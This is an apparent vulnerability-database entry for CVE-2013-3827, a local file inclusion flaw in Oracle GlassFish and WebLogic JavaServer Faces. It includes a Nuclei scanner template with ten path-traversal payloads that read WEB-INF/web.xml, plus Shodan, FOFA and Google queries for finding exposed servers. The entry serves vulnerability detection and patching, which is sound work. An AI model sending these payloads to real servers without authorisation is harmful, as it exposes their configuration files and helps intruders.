Javafaces LFI

2021-06-3010:50:41

ProjectDiscovery

github.com

128

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

5.3

Confidence

Low

EPSS

0.175

Percentile

96.1%

JSON

An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.

id: CVE-2013-3827

info:
  name: Javafaces LFI
  author: Random-Robbie
  severity: medium
  description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
  remediation: |
    Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
    - https://www.exploit-db.com/exploits/38802
    - https://www.oracle.com/security-alerts/cpuoct2013.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
    - http://rhn.redhat.com/errata/RHSA-2014-0029.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2013-3827
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.64598
    epss-percentile: 0.97602
    cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 10
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve,cve2013,edb,lfi,javafaces,oracle

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5aaa0cf657fb07a07b2e7f3dbfb89dfcfd5ecbec95eebcc67d0a16b7027742b02205cda39d97b2037ad46ec76430102bb2e98c99138c3a92af1bca614d667d8489c:922c64590222798bb761d5b6d8e72950